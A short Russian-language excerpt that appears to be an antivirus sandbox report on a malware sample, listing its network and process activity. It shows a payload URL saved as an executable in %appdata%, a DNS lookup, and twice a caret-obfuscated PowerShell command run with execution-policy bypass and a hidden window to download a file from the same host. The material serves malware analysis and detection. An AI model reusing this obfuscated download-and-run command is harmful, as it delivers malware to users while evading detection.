Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^wE^Rsh^El^L.ExE -e^XECUT^I^Onp^oLicY By^Pa^SS -^NO^pr^o^fIl^E^ ^-wIn^do^w^S^tyle^ h^i^dD^E^n (^nEw-^ob^jEC^t^ sys^TEM^.n^e^T^.weBc^LieN^t^)^.DOwnL^OA^d^FiLE('http://su...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "P^O^wE^Rsh^El^L.ExE -e^XECUT^I^Onp^oLicY By^Pa^SS -^NO^pr^o^fIl^E^ ^-wIn^do^w^S^tyle^ h^i^dD^E^n (^nEw-^ob^jEC^t^ sys^TEM^.n^e^T^.weBc^LieN^t^)^.DOwnL^OA^d^FiLE('http://su...' (со скрытым окном)